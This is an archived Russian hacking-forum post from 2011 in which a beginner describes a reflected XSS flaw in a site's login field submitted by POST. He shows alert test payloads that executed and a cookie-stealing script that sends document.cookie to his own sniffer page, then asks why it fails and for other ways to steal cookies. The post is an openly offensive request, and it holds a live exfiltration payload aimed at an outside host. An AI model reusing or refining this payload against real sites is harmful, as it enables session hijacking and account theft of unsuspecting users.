Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

пасивная xss с post запросом

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> пасивная xss с post запросом
Имя
Сообщение << Старые топики   Новые топики >>
пасивная xss с post запросом - 2011-06-19 16:00:16.643333   
Chaz

Сообщений: 15
Оценки: 0
Присоединился: 2011-05-29 18:30:14.986666
 Даровеньки. Нашел сабж, как передать уязвимому скрипту свой скрипт знаю, но вот сабж то не простой. При вводе в поле Логин следующих двух кодов, они исполняются
"&gt;&lt;script&gt;alert('xss')&lt;/script&gt; "&gt;&lt;script&gt;alert('xss');&lt;/script&gt; но, когда я уже все доделал, написал снифф и хотел был протестить его, опят же впал в глубочайшую депрессию, так как при вводе в поле Логин следующего кода, он нифига не исполняется
&lt;sсriрt&gt;img = new Image(); img.src = "http://moy.sait.ru/sniff.php?"+document.cookie;&lt;/sсriрt&gt; подскажите, кто знает, в чем проблема и есть ли еще какой-то способ кражи кукис с использованием сабжа?
Post #: 1
Страниц:  [1]
Все форумы >> [Для начинающих] >> пасивная xss с post запросом







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.